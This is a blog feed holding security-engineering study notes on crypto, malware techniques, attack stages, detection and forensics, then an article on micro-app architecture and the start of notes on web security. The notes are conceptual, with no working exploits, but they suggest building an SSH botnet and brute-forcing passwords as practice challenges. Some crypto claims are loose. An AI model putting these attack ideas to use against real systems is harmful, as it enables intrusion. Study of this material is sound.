<li><p><strong>Hashing:</strong> This is the process of converting any input (plaintext or ciphertext) into a fixed-length string of characters, called a hash. Hashing is a one-way process, meaning that it is difficult (ideally impossible) to derive the original input from the hash. Hashing is often used to store passwords securely.</p>
</li>
<li><p><strong>Obfuscation:</strong> This is the process of making data or code more difficult to understand or read. Obfuscation does not provide any security or protection and can often be reversed with enough effort.</p>
</li>
<li><p><strong>Signing:</strong> This is the process of attaching a digital signature to a message or document to prove the authenticity and integrity of the message or document. A digital signature is generated using a private key and can only be verified using the corresponding public key. Signing is often used to ensure the integrity and authenticity of digital documents.</p>
</li>
</ul>
<p>Various attack models, such as the <strong>chosen-plaintext attack</strong>, refer to different methods that an attacker can use to try to compromise the security of a cryptographic system. For example, a chosen-plaintext attack involves an attacker being able to choose the plaintext input to an encryption algorithm and observing the resulting ciphertext output. This can be used to try to derive the secret key or other sensitive information.</p>
<p>As for encryption standards and implementations, some commonly used ones include:</p>
<ul>
<li><p><strong>RSA (asymmetric encryption)</strong></p>
</li>
<li><p><strong>AES (symmetric encryption)</strong></p>
</li>
<li><p><strong>ECC (elliptic curve cryptography, including ed25519)</strong></p>
</li>
<li><p><strong>Chacha/Salsa (symmetric encryption)</strong></p>
</li>
</ul>
<p><strong>Asymmetric encryption,</strong> such as RSA and ECC, involves using a public key and a private key to encrypt and decrypt data. Asymmetric encryption is slower than symmetric encryption, but it is more secure and is often used to establish a trusted connection or transfer a shared secret key.</p>
<p><strong>Symmetric encryption</strong>, such as AES and Chacha/Salsa, uses a single shared secret key to encrypt and decrypt data. Symmetric encryption is faster than asymmetric encryption, but it requires the secure sharing of the secret key. Many cryptographic protocols use a combination of both asymmetric and symmetric encryption, such as using asymmetric encryption to establish a secure connection and then using symmetric encryption for the actual data transfer.</p>
<p><strong>Perfect forward secrecy (PFS)</strong> is a property of some cryptographic protocols that ensures that even if an attacker can compromise the secret key used for symmetric encryption, they cannot use that key to decrypt past communications. This is achieved by using a different symmetric key for each communication session. PFS is used in some secure messaging applications, such as Signal.</p>
<p><strong>Cryptography, Authentication,</strong> and Identity are all important concepts in computer security. A brief overview of these concepts follows.</p>
<p><strong>Cryptography:</strong></p>
<p><strong>Encryption vs Encoding vs Hashing vs Obfuscation vs Signing:</strong> Encryption, encoding, hashing, obfuscation, and signing are all different techniques used in cryptography to achieve different security goals. Encryption is the process of converting plain text into cipher text using a key, making it unreadable by unauthorized parties. Encoding, on the other hand, is the process of converting data into a particular format that is usable by systems, but it doesn't provide any security. Hashing is the process of transforming data into a fixed-length string that is unique to the input data. Obfuscation is the process of making code or data difficult to understand or read. Signing is the process of attaching a digital signature to a message, which can verify the authenticity of the message and the sender.</p>
<p><strong>Asymmetric vs symmetric:</strong> Asymmetric encryption is slow but good for establishing a trusted connection, while symmetric encryption is faster and uses a shared key. Many protocols use asymmetric encryption to transfer a symmetric key, which is then used for the actual data encryption. Perfect forward secrecy is a concept where even if the symmetric key is compromised, it cannot be used to decrypt previously encrypted data.</p>
<p><strong>Ciphers:</strong></p>
<p><strong>Block vs stream ciphers:</strong> Block ciphers encrypt data in fixed-size blocks, while stream ciphers encrypt data one bit or byte at a time.</p>
<p><strong>Block cipher modes of operation:</strong> Block ciphers can be used in various modes of operation to achieve different security goals, such as confidentiality, integrity, and authenticity. Some popular modes of operation include ECB, CBC, OFB, and CTR.</p>
<p><strong>AES-GCM:</strong> AES-GCM is a block cipher mode of operation that combines the AES block cipher with the Galois/Counter Mode (GCM) of operation for authenticated encryption with associated data (AEAD).</p>
<p><strong>Integrity and authenticity primitives:</strong></p>
<p>Hashing functions, MACs, and HMACs are all primitives used for data integrity and authenticity.</p>
<p><strong>Hashing functions:</strong> Hashing functions are used to create a fixed-length "fingerprint" of data. Common hashing functions include MD5, SHA-1, and BLAKE.</p>
<p><strong>MACs and HMACs:</strong> MACs (Message Authentication Codes) and HMACs (Keyed-hash Message Authentication Codes) are used to verify the integrity and authenticity of data. They use a shared secret key to create a "tag" that is attached to the data, which can be verified by the receiver.</p>
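<p>The following is an added example, not part of the original notes: it runs encoding, an unkeyed hash, and an HMAC over the same message to show why only the keyed tag proves authenticity. The message, the key, and all function names are constructed for illustration.</p>

```python
"""Encoding vs. hashing vs. HMAC on one constructed message (standard library only)."""
import base64
import hashlib
import hmac
import secrets

# Constructed sample data: a fake transfer instruction and a random shared key.
MESSAGE = b"transfer=100;to=alice"
SHARED_KEY = secrets.token_bytes(32)  # known only to sender and receiver


def encode(data: bytes) -> bytes:
    """Encoding: a format change only. Anyone can reverse it, no key involved."""
    return base64.b64encode(data)


def decode(data: bytes) -> bytes:
    """Reverse of encode(); requires no secret."""
    return base64.b64decode(data)


def digest(data: bytes) -> bytes:
    """Unkeyed hash: a fixed-length fingerprint that anyone can recompute."""
    return hashlib.sha256(data).digest()


def make_tag(key: bytes, data: bytes) -> bytes:
    """HMAC-SHA256: a fingerprint that can only be produced with the shared key."""
    return hmac.new(key, data, hashlib.sha256).digest()


def verify_digest(data: bytes, received: bytes) -> bool:
    """Receiver-side check when only an unkeyed hash accompanies the data."""
    return hmac.compare_digest(digest(data), received)


def verify_tag(key: bytes, data: bytes, received: bytes) -> bool:
    """Receiver-side check of an HMAC tag."""
    # compare_digest runs in constant time, so the check does not leak
    # how many leading bytes of a wrong tag happened to match.
    return hmac.compare_digest(make_tag(key, data), received)


def tamper_in_transit(data: bytes) -> bytes:
    """Model of a modification on the wire by a party without the key."""
    return data.replace(b"to=alice", b"to=mallory")


def run_demo() -> dict:
    sent_digest = digest(MESSAGE)
    sent_tag = make_tag(SHARED_KEY, MESSAGE)

    altered = tamper_in_transit(MESSAGE)
    # Whoever alters the message can also recompute an unkeyed hash ...
    recomputed_digest = digest(altered)
    # ... but without SHARED_KEY can only guess at a valid tag.
    guessed_tag = make_tag(secrets.token_bytes(32), altered)

    return {
        "encoding_reversible": decode(encode(MESSAGE)) == MESSAGE,
        "digest_length": len(sent_digest),
        "hash_rejects_altered_with_old_digest": not verify_digest(altered, sent_digest),
        "hash_accepts_altered_with_new_digest": verify_digest(altered, recomputed_digest),
        "hmac_accepts_original": verify_tag(SHARED_KEY, MESSAGE, sent_tag),
        "hmac_rejects_altered_with_old_tag": not verify_tag(SHARED_KEY, altered, sent_tag),
        "hmac_rejects_altered_with_guessed_tag": not verify_tag(SHARED_KEY, altered, guessed_tag),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

<p>The line to watch is <code>hash_accepts_altered_with_new_digest</code>: an unkeyed hash sent alongside the data detects accidental corruption only, because anyone who can change the data can also replace the hash.</p>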
<p><strong>Entropy:</strong></p>
<p>PRNGs, entropy buffer draining, and methods of filling entropy buffers are all concepts related to generating random data in a computer system.</p>
<p><strong>PRNGs:</strong> PRNGs (Pseudo Random Number Generators) are used to generate random data in computer systems. They are deterministic algorithms that use a seed value to generate random-looking data.</p>
<p><strong>Entropy buffer draining:</strong> Entropy buffer draining is the process of using up the random data available in the system's entropy pool. This can cause problems with cryptographic operations that require random data.</p>
<p><strong>Methods of filling entropy buffer:</strong> There are several methods for filling the entropy buffer, including mouse movements, keyboard timings, network timings, and hardware events.</p>
<p><strong>Authentication:</strong></p>
<p>Certificates, TPMs, OAuth, Auth Cookies, Sessions, SAMLv2, OpenID, Kerberos, Biometrics, Password Management, U2F/FIDO, and multi-factor auth methods are all different concepts related to authentication.</p>
<h1 id="heading-malware-amp-reversing">Malware &amp; Reversing:</h1>
<p><strong>Malware</strong> is a type of software that is designed to harm or exploit computer systems, often for financial gain. Malware can come in many forms, such as viruses, worms, Trojans, spyware, ransomware, and more. Here are some key topics related to malware:</p>
<h2 id="heading-interesting-malware"><strong>Interesting malware:</strong></h2>
<ul>
<li><p><strong>Conficker:</strong> A worm that spread rapidly in 2008 and infected millions of computers around the world, exploiting a vulnerability in Windows operating systems.</p>
</li>
<li><p><strong>Morris worm:</strong> One of the first worms to gain widespread attention, created by a graduate student in 1988 to demonstrate the potential risks of networked computers.</p>
</li>
<li><p><strong>Zeus malware</strong>: A Trojan horse that targets online banking systems, stealing login credentials and financial information from infected machines.</p>
</li>
<li><p><strong>Stuxnet:</strong> A highly sophisticated worm that targeted industrial control systems, believed to be created by a nation-state to damage Iranian nuclear facilities.</p>
</li>
<li><p><strong>Wannacry:</strong> A ransomware attack that spread globally in 2017, using a vulnerability in Windows operating systems to encrypt data on infected machines.</p>
</li>
<li><p><strong>CookieMiner:</strong> Malware that targets macOS systems to steal sensitive information from cryptocurrency exchanges and users.</p>
</li>
<li><p><strong>Sunburst</strong>: A supply chain attack that affected many organizations, including U.S. government agencies, by compromising the SolarWinds software.</p>
</li>
</ul>
<h2 id="heading-malware-features"><strong>Malware features:</strong></h2>
<ul>
<li><p><strong>Remote code execution:</strong> Techniques for getting malicious code to run on a target system.</p>
</li>
<li><p><strong>Domain-flux and Fast-Flux:</strong> Techniques for changing the IP addresses of C2 servers to evade detection and takedowns.</p>
</li>
<li><p><strong>Covert C2 channels:</strong> Techniques for hiding the communication between malware and C2 servers, such as using legitimate network protocols or hiding data in images.</p>
</li>
<li><p><strong>Evasion techniques:</strong> Techniques for avoiding detection and analysis by security software or researchers, such as checking for the presence of sandboxes or VMs.</p>
</li>
<li><p><strong>Process hollowing:</strong> A technique for creating a new process in a suspended state and then replacing its memory with malicious code, to evade detection by antivirus software.</p>
</li>
<li><p><strong>Mutexes:</strong> A technique for preventing multiple instances of malware from running on the same system.</p>
</li>
<li><p><strong>Multi-vector and polymorphic attacks:</strong> Techniques for using multiple attack vectors and changing the appearance of the malware to evade detection and analysis.</p>
</li>
<li><p><strong>RAT (remote access trojan) features:</strong> Capabilities for remote control of infected machines, such as keylogging, screen capture, and file transfer.</p>
</li>
</ul>
<h2 id="heading-decompilingreversing">Decompiling/reversing:</h2>
<ul>
<li><p><strong>Obfuscation of code and unique strings:</strong> Techniques for hiding the true purpose and behavior of malware, such as using random variable names or encrypting strings.</p>
</li>
<li><p><strong>IDA Pro, Ghidra:</strong> Reverse engineering tools for analyzing malware code and behavior.</p>
</li>
</ul>
<p>Static and dynamic analysis are two approaches used to analyze software or code for security vulnerabilities and potential threats.</p>
<p><strong>Static analysis</strong> involves examining the code without executing it, to identify security flaws or other issues that may be present. This is done by examining the source code, byte code, or machine code of the program. This approach can be automated and is often used to scan large codebases for common vulnerabilities, such as buffer overflows or SQL injection.</p>
<p><strong>Dynamic analysis</strong>, on the other hand, involves running the software in a controlled environment to observe its behavior and identify any issues that may arise during runtime. This approach involves executing the code and observing its interactions with the operating system, network, and other resources. This approach can be useful for detecting issues that may not be apparent during static analysis, such as runtime errors, memory leaks, or other issues related to program execution.</p>
<p><strong>VirusTotal</strong>, <a target="_blank" href="http://Reverse.it"><strong>Reverse.it</strong></a>, and <strong>Hybrid Analysis</strong> are all online services that provide both static and dynamic analysis of software and code. These services allow users to submit files or URLs for analysis and provide reports on any potential security threats or issues that may be present. They also use machine learning and other advanced techniques to identify potential threats and vulnerabilities in code.</p>
<h1 id="heading-exploits">Exploits:</h1>
<p>Social engineering attacks aim to trick people into performing certain actions that can harm the security of the system or the data stored within it. Common social engineering attacks include phishing, spear phishing, baiting, and tailgating.</p>
<p>Physical attacks target the physical security of the system or data and often involve gaining physical access to the system or device. Such attacks can be mitigated by using disk encryption, trusted platform modules, and other security mechanisms.</p>
<p>Network attacks involve finding vulnerabilities in networked systems and exploiting them to gain unauthorized access. Attackers use tools like Nmap, Metasploit, and Shodan to scan networks, search for vulnerabilities, and launch attacks.</p>
<p>Exploit kits and drive-by download attacks are typically used to distribute malware to unsuspecting victims through infected websites or emails.</p>
<p>Remote control attacks involve taking control of a remote system, typically through a vulnerability or exploit. These attacks can lead to remote code execution and privilege escalation.</p>
<p>Spoofing attacks involve impersonating a legitimate entity to gain unauthorized access or launch attacks. Spoofing can be done for email, IP addresses, MAC addresses, and biometric data.</p>
<p>Tools like Metasploit, ExploitDB, Shodan, and Hak5 are used by security researchers and attackers alike to find and exploit vulnerabilities. It's important to note that using such tools for unauthorized purposes is illegal and can lead to severe legal consequences.</p>
<h1 id="heading-attack-structure">Attack Structure:</h1>
<ol>
<li><p><strong>Reconnaissance:</strong> The attacker gathers information about the target, often through open-source intelligence (OSINT) methods like Google Dorking or using tools like Shodan to identify vulnerable systems.</p>
</li>
<li><p><strong>Resource development:</strong> The attacker builds the infrastructure and tools needed for the attack, which may include creating malware or obtaining access to compromised systems.</p>
</li>
<li><p><strong>Initial access:</strong> The attacker gains access to the target network or system, often through methods like phishing or exploiting public-facing applications.</p>
</li>
<li><p><strong>Execution:</strong> The attacker runs code on the compromised system, often through shells or interpreters like PowerShell or Python.</p>
</li>
<li><p><strong>Persistence:</strong> The attacker establishes a foothold in the compromised system by creating backdoors and modifying startup scripts.</p>
</li>
<li><p><strong>Privilege escalation:</strong> The attacker elevates their access privileges on the compromised system, often through methods like token or key theft.</p>
</li>
<li><p><strong>Defense evasion:</strong> The attacker attempts to evade detection and defensive measures, such as disabling logging or reverting virtual machines.</p>
</li>
<li><p><strong>Credential access:</strong> The attacker gains access to login credentials, often through methods like brute-forcing or keylogging.</p>
</li>
<li><p><strong>Discovery:</strong> The attacker explores the target system and network, looking for other vulnerable systems or sensitive information.</p>
</li>
<li><p><strong>Lateral movement:</strong> The attacker moves laterally through the network, compromising additional systems and accounts.</p>
</li>
<li><p><strong>Collection:</strong> The attacker steals valuable information or data, often through methods like capturing audio or video, database dumps, or intercepting network traffic.</p>
</li>
<li><p><strong>Exfiltration</strong>: The attacker removes stolen data from the target network, often through covert channels like DNS exfiltration or cloud backup services.</p>
</li>
<li><p><strong>Command and control:</strong> The attacker maintains communication with the compromised systems, often through encrypted channels or removable media.</p>
</li>
<li><p><strong>Impact:</strong> The attacker achieves their objectives, which may include data theft, data destruction, or disruption of services.</p>
</li>
</ol>
<h1 id="heading-threat-modeling">Threat Modeling:</h1>
<p><strong>The Threat Matrix</strong> is a tool used to map out and visualize the different types of threats facing an organization. It is often used as part of a risk assessment process to identify and prioritize the most critical risks. The matrix typically includes different threat categories along one axis (such as natural disasters, human error, cyber attacks, etc.) and the potential impacts along the other axis (such as financial losses, reputational damage, legal/regulatory penalties, etc.).</p>
<p><strong>Trust boundaries</strong> refer to the points in a system where different levels of trust exist, and where security controls are typically implemented to protect the system. For example, a trust boundary might exist between an organization's internal network and the public Internet, or between different parts of an application that handle sensitive data and those that do not.</p>
<p><strong>Security controls</strong> are measures put in place to protect systems, data, and other assets from threats. These can include technical controls such as firewalls, intrusion detection systems, and encryption, as well as administrative controls such as policies, procedures, and employee training.</p>
<p><strong>The STRIDE framework</strong> is a tool for identifying and categorizing potential threats to software systems. The six threat categories in the framework are Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege.</p>
<p><strong>The MITRE ATT&amp;CK framework</strong> is a knowledge base of adversary tactics and techniques based on real-world observations of cyber attacks. It is organized into different categories of tactics, such as initial access, execution, persistence, and exfiltration, and includes specific techniques associated with each tactic.</p>
<p><strong>Lilly Ryan's "Defense Against the Dark Arts"</strong> talk is a presentation on information security that uses examples from the Harry Potter series to explain concepts such as threat modeling, incident response, and risk management. It is a creative and engaging way to introduce people to these important security concepts.</p>
<h1 id="heading-detection">Detection:</h1>
<ol>
<li><p><strong>IDS:</strong> An Intrusion Detection System is a security system that detects unauthorized access to a network or computer system. It can be signature-based or behavior-based and uses rules to identify potential security threats.</p>
</li>
<li><p><strong>SIEM:</strong> Security Information and Event Management is a technology that provides real-time analysis of security alerts generated by network hardware and applications. It collects and correlates data from multiple sources, allowing for the detection of complex security incidents.</p>
</li>
<li><p><strong>IOC:</strong> Indicator of Compromise is a piece of forensic data that suggests that a system has been hacked or compromised. It may include information such as IP addresses, file names, or other artifacts.</p>
</li>
<li><p><strong>Honeypots:</strong> A honeypot is a decoy system set up to attract and detect hackers. It can be a server or a network of servers designed to mimic a legitimate system, gather information about attacks and analyze them.</p>
</li>
<li><p><strong>Firewall rules:</strong> Firewall rules are used to block or allow traffic based on specific criteria. For example, they can be set up to detect brute-force attacks or port scanning.</p>
</li>
<li><p><strong>Anomaly / Behavior-based detection:</strong> This is a technique used to detect security threats by monitoring network traffic for patterns that are not typical. It involves developing a baseline of normal network behavior and then identifying deviations from this baseline.</p>
</li>
<li><p><strong>Tools for detection:</strong> There are various tools used in threat detection such as Splunk, ArcSight, Qradar, Darktrace, Tcpdump, Wireshark, and Zeek.</p>
</li>
<li><p><strong>Things to know about attackers:</strong> Attackers can use various techniques to evade detection, such as spoofing packets or creating a lot of noise. It can be challenging to correlate IP addresses with physical locations.</p>
</li>
<li><p><strong>Logs to look at:</strong> Several types of logs can be useful for detecting security threats, including DNS queries, HTTP headers, traffic volume, traffic patterns, and execution logs.</p>
</li>
<li><p><strong>A curated list of awesome threat detection resources:</strong> This is a list of various resources related to threat detection, such as blogs, tools, and frameworks.</p>
</li>
</ol>
<h1 id="heading-digital-forensics">Digital Forensics:</h1>
<p>Digital forensics is the process of collecting, preserving, analyzing, and presenting electronic data in a way that is admissible in a court of law. It is often used to investigate computer-related crimes or to recover data that has been lost or deleted.</p>
<ul>
<li><p><strong>Evidence volatility:</strong> different types of evidence (network, memory, disk) have different levels of volatility, which affects how they are collected and analyzed.</p>
</li>
<li><p><strong>Network forensics:</strong> analyzing network traffic, including DNS logs, NetFlow, and sampling rates.</p>
</li>
<li><p><strong>Disk forensics:</strong> analyzing data stored on disk, including disk imaging, filesystems, logs, and data recovery.</p>
</li>
<li><p><strong>Memory forensics:</strong> analyzing data stored in memory, including memory acquisition, memory structures, and tools like Volatility and WinDbg.</p>
</li>
<li><p><strong>Mobile forensics:</strong> analyzing data stored on mobile devices, including differences between mobile and computer forensics, and specific considerations for Android vs. iPhone.</p>
</li>
<li><p><strong>Anti-forensics:</strong> techniques used by malware to try to hide, such as timestomping.</p>
</li>
<li><p><strong>Chain of custody:</strong> documentation and procedures used to maintain the integrity of the evidence, including handover notes.</p>
</li>
</ul>
<p>These concepts and tools are used by digital forensics investigators to collect and analyze electronic evidence in a way that is accurate, reliable, and legally admissible.</p>
<h1 id="heading-incident-management">Incident Management:</h1>
<p>Incident management is the process of responding to and resolving information security or privacy incidents when they occur. It involves a coordinated effort to detect, investigate, contain, and recover from the incident while minimizing damage to the organization.</p>
<p>Some key concepts and best practices in incident management include:</p>
<ul>
<li><p>Understanding the difference between privacy incidents (breaches of personal information) and information security incidents (breaches of company systems or data).</p>
</li>
<li><p>Knowing when to involve legal, users, managers, and directors in the incident response process.</p>
</li>
<li><p>Running through different scenarios to understand how an incident might unfold, from start to finish.</p>
</li>
<li><p>Delegating roles and responsibilities and establishing clear lines of communication between team members.</p>
</li>
<li><p>Identifying the type of alert triggering the incident and understanding how to find the root cause of the issue.</p>
</li>
<li><p>Understanding the stages of an attack (such as the cyber-kill chain) and the difference between symptoms and causes.</p>
</li>
<li><p>Building a timeline of events to identify the scope and impact of the incident.</p>
</li>
<li><p>Assuming good intent and working collaboratively with people to resolve the issue.</p>
</li>
<li><p>Developing response models such as SANS' PICERL (Preparation, Identification, Containment, Eradication, Recovery, Lessons learned) or Google's IMAG (Incident Management At Google) to guide the response effort.</p>
</li>
</ul>
<p>Overall, incident management is an essential part of any organization's information security and privacy program. It involves a coordinated effort to detect, respond to, and recover from incidents while minimizing damage to the organization and protecting its assets.</p>
<h1 id="heading-coding-amp-algorithms">Coding &amp; Algorithms:</h1>
<ul>
<li><p><strong>The basics:</strong> This covers fundamental concepts such as conditions, loops, dictionaries, lists, arrays, string and array operations, and pseudo code.</p>
</li>
<li><p><strong>Data structures:</strong> This section delves into more complex data structures such as dictionaries/hash tables, arrays, stacks, SQL/tables, and Big tables.</p>
</li>
<li><p><strong>Sorting:</strong> Quicksort and merge sort are common algorithms used to sort data.</p>
</li>
<li><p><strong>Searching:</strong> This section covers binary and linear search algorithms.</p>
</li>
<li><p><strong>Big O:</strong> This refers to the time and space complexity of algorithms.</p>
</li>
<li><p><strong>Regular expressions:</strong> A powerful tool for pattern matching in strings.</p>
</li>
<li><p><strong>Recursion:</strong> A technique where a function calls itself to solve a problem.</p>
</li>
<li><p><strong>Python:</strong> A popular programming language with features such as list comprehensions, generators, slicing, regular expressions, and dynamic types. The section also compares Python to other programming languages and emphasizes the importance of understanding common functions.</p>
</li>
</ul>
<h1 id="heading-security-themed-coding-challenges">Security Themed Coding Challenges:</h1>
<p>These security-themed coding challenges provide a great opportunity for developers to practice their skills in text parsing and manipulation, basic data structures, and simple logic flows while also learning about various aspects of security engineering.</p>
<p>One of the challenges involves implementing a cipher that converts text to emoji or some other format, which can help developers understand how encryption works and how to implement basic ciphers. Another challenge involves parsing arbitrary logs to extract specific details such as domains, executable names, and timestamps, which can help developers understand how to handle and manipulate large amounts of data.</p>
<ul>
<li><p>Web scraping is another challenge where developers need to write a script to extract information from a website. This can be useful for gathering data for research or analysis purposes. Port scanning is also a common task in security engineering, and writing a port scanner or detecting port scanning can help developers understand how networks and ports work.</p>
</li>
<li><p>The challenge of building an SSH botnet can help developers understand how botnets work and how to build and deploy one. Password brute-forcing is another challenge where developers need to generate credentials and store successful logins, which can help them learn about password security and common password vulnerabilities.</p>
<p>  Another challenge is to write a mini forensics tool to collect identifying information from PDF metadata, which can help developers understand how to extract and analyze metadata from various types of files. Recovering deleted items is another challenge where developers need to find out where deleted items are stored and write a script to pull them from local databases.</p>
</li>
<li><p>Finally, the challenge of creating a program that looks for malware signatures in binaries and code samples can help developers understand how to detect and analyze malware; Yara rules are a good place to look for examples.</p>
</li>
</ul>
<p><strong>Developers are encouraged to put their work-in-progress scripts on GitHub and link them to their resume/CV, even if they are not perfect or complete, as this can demonstrate their skills and interest in security engineering.</strong></p>
<hr />
<blockquote>
<p>It was my pleasure assisting you. I hope this was helpful and provided you with the information you were looking for. Don't hesitate to reach out to me if you need further assistance in the future. Have a great day!</p>
<details><summary>@WarrenMu (github)</summary><div data-type="detailsContent"></div></details></blockquote>
]]></content:encoded></item><item><title><![CDATA[Micro-App Architecture: A design approach to enterprise application software development]]></title><description><![CDATA[Introduction
Application software is a kind of software designed for users to achieve a certain task. This is in contrast with utility or system software designed to maintain or operate the machine on which application software is running. Examples o...]]></description><link>https://blog.oscakampala.org/micro-app-architecture-a-design-approach-to-enterprise-application-software-development</link><guid isPermaLink="true">https://blog.oscakampala.org/micro-app-architecture-a-design-approach-to-enterprise-application-software-development</guid><category><![CDATA[architecture]]></category><category><![CDATA[app development]]></category><dc:creator><![CDATA[TobiasHT]]></dc:creator><pubDate>Sat, 18 Feb 2023 18:36:10 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1676725636067/7efd8c5e-bf92-43df-9057-93685032d701.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-introduction">Introduction</h2>
<p>Application software is a kind of software designed for users to achieve a certain task. This is in contrast with utility or system software designed to maintain or operate the machine on which application software is running. Examples of application software include multimedia players, social media apps, banking apps and much more. Application software can run on devices of different shapes, sizes or form factors, and to capture a wider market, an application developer should consider building applications for these form factors. Traditionally, mobile and desktop have been the major platforms that applications run on, but recently we're starting to see more smart devices such as smart watches, smart TVs, smart speakers, VR headsets and a variety of other form factors.</p>
<h3 id="heading-problem-statement">Problem statement</h3>
<p>As introduced above, application software is software designed for the user to achieve a certain task. For example, word processing applications are designed for users to work on documents and publications, whereas browsers are designed to enable users to navigate the World Wide Web. Traditionally, applications designed for a certain platform or form factor tend to be tightly coupled with that platform. For example, a developer building an application for the Android, iOS or Windows platforms will tend to build a system so tightly coupled that it would be difficult to run that application on a different platform without significant rewriting of the code and internal infrastructure. Such designs have been so prevalent in the enterprise world that companies have hired huge departments to maintain code for their applications running on multiple platforms. Examples of such companies include Facebook, which is currently working on evolving both its Android and iOS applications.</p>
<p>The tightly coupled infrastructure hinders code reuse and takes more effort to maintain, thus becoming expensive to manage. Applications of such magnitude tend to be complex for new hires to work on and deploy, which also exerts a heavy toll on maintenance and on adding new features.</p>
<h3 id="heading-micro-app-architecture">Micro-App architecture</h3>
<p>Given the challenges that come with a tightly coupled application system, a new enterprise application software development pattern has arisen. Technically, the Micro-App architecture does not introduce any new concepts. It takes existing concepts already implemented in the <strong>micro-services</strong> and <strong>micro-kernel</strong> world and brings them to application software development.</p>
<h4 id="heading-advantages">Advantages</h4>
<p>Micro-App architecture encourages code reuse on different application platforms. This reduces maintenance costs as you only have a single team maintaining code running on all major platforms.</p>
<p>It also reduces the complexity of the code as it breaks down the huge chunks of monolithic codebases into small bite-sized independent and manageable projects that can be deployed independently.</p>
<p>With faster deployment, businesses can now easily roll out new features for their services to customers faster and more efficiently.</p>
<p>It takes away the need to maintain platform-specific code, which is fairly stable, and shifts focus to the highly volatile business logic.</p>
<p>It encourages modularity and extensibility of the application. This gives an interface for other developers to extend your main application with desired functionality very easily.</p>
<h3 id="heading-architectural-overview">Architectural overview</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1676741713581/909ffab1-70fe-4ddf-9403-91f7f09f019c.jpeg" alt class="image--center mx-auto" /></p>
<p>Micro-App architectures can be implemented in various forms. However, one major feature that categorizes this pattern is the separation of <strong>platform-specific</strong> code from the <strong>business-logic</strong> code. The point of separation is what causes variation in different patterns.</p>
<h4 id="heading-server-driven-ui-sdui">Server-driven UI (SDUI)</h4>
<p>Server-driven UI is a Micro-App design pattern where the user interface of the application is generated by an online server. This kind of approach has been implemented by various companies including Spotify, Airbnb and the first versions of the Facebook app. The interface is usually run as a webpage in a webview embedded in a native application. This separates the native maintenance of the stable platform code from the volatile business logic, allowing businesses to push changes fast. Spotify is leveraging this pattern to push new features to clients as fast as possible to keep up with market trends.</p>
<h4 id="heading-use-of-frameworks">Use of Frameworks</h4>
<p>Mobile application frameworks allow us to build the logic and interface of our applications in platform-agnostic code that can easily be deployed on all supported platforms. However, to leverage more platform-specific features, frameworks should be able to provide access to the underlying platform on which the application is running. This allows the developer to configure different functionality depending on the platform.</p>
<h4 id="heading-use-of-a-domain-specific-language-dsl">Use of a Domain-Specific Language (DSL)</h4>
<p>The other way to implement a Micro-App architecture is to build the native application as a <strong>Base Application</strong>, also known as a <strong>Platform Application</strong> or <strong>Foundation Application</strong>, written in the language of the host system (such as Kotlin/Java for Android and Swift/Objective-C for iOS). This native application then hosts a runtime for a domain-specific language of your choice in which you implement the business logic. The DSL could be a language such as Lua, Python, JavaScript or any other language you choose. The Platform Application then exposes a set of API functions to the DSL runtime that enables the business logic to interact with the underlying system. The business logic written in the DSL can then be easily moved to other platforms that implement the runtime.</p>
<h4 id="heading-use-of-abstractions">Use of Abstractions</h4>
<p>If the language used to implement the business logic is the same as the language used by the underlying system, for example, if you're building an Android app with both business logic and native platform code written in Java, you can abstract away access to the native platform. For example, instead of the business logic directly accessing a specific part of the UI such as a button, it can be abstracted away via an API provided by the Platform Application, which will create the button for the business logic layer.</p>
<h3 id="heading-conclusion">Conclusion</h3>
<p>In conclusion, Micro-App architectures have the power to help you, as a business competing in a fast-moving market, to stay ahead of your game. They reduce the number of times a client has to go to the app store to update their app just because you pushed a new change to the business logic or user interface. They also greatly reduce the size of your application and dial down its complexity, so they are worth looking into. For a little more reading, you can find links below to the articles I referenced in my submission.</p>
<h3 id="heading-further-reading">Further reading</h3>
<p><a target="_blank" href="https://engineering.fb.com/2022/10/24/android/android-java-kotlin-migration/">https://engineering.fb.com/2022/10/24/android/android-java-kotlin-migration/</a></p>
<p><a target="_blank" href="https://engineering.fb.com/2023/02/06/ios/facebook-ios-app-architecture/">https://engineering.fb.com/2023/02/06/ios/facebook-ios-app-architecture/</a></p>
<p><a target="_blank" href="https://www.robosoftin.com/blog/world-of-micro-apps">https://www.robosoftin.com/blog/world-of-micro-apps</a></p>
<p><a target="_blank" href="https://shopify.engineering/server-driven-ui-in-shop-app">https://shopify.engineering/server-driven-ui-in-shop-app</a></p>
]]></content:encoded></item><item><title><![CDATA[Security engineering  basing on gracenolan notes. part 3]]></title><description><![CDATA[Welcome. Today we are going to continue with gracenolan notes. Please do some further deep-diving in web application pen-testing as there are many technical details to understand and practical workouts. Am writing according to the notes. Try out labs...]]></description><link>https://blog.oscakampala.org/security-engineering-basing-on-gracenolan-notes-part-3</link><guid isPermaLink="true">https://blog.oscakampala.org/security-engineering-basing-on-gracenolan-notes-part-3</guid><category><![CDATA[hacking]]></category><category><![CDATA[hack]]></category><dc:creator><![CDATA[WarrenMu]]></dc:creator><pubDate>Mon, 30 Jan 2023 09:02:39 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1675069247941/94d002a5-8ccd-403d-b5b7-d1bbe97a9f47.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<ul>
<li>Welcome. Today we are going to continue with gracenolan notes. Please do some further deep-diving into web application pen-testing, as there are many technical details to understand and practical workouts. I am writing according to the notes. Try out labs and have fun.</li>
</ul>
<h3 id="heading-web-applications">Web Applications:</h3>
<ul>
<li><p><strong>Same origin policy:</strong> This policy is a cornerstone of web security and is implemented in web browsers to prevent malicious attacks such as Cross-Site Scripting (XSS). It states that a web page loaded from one origin (e.g. <a target="_blank" href="http://example.com">example.com</a>) cannot access resources (e.g. images, scripts, cookies) from another origin (e.g. <a target="_blank" href="http://evil.com">evil.com</a>). This is to prevent sensitive information from being leaked to unauthorized domains.</p>
</li>
<li><p><strong>CORS:</strong> CORS stands for Cross-Origin Resource Sharing and is a mechanism that allows a web page from one origin to make requests to another origin. This is useful for scenarios where a web page wants to access data from another domain, for example, to fetch data from a third-party API. CORS works by sending an HTTP request to the target domain with specific headers, asking the server to grant permission to access its resources. If the server allows access, it will include the necessary headers in the response to indicate that the browser can proceed with the request.</p>
</li>
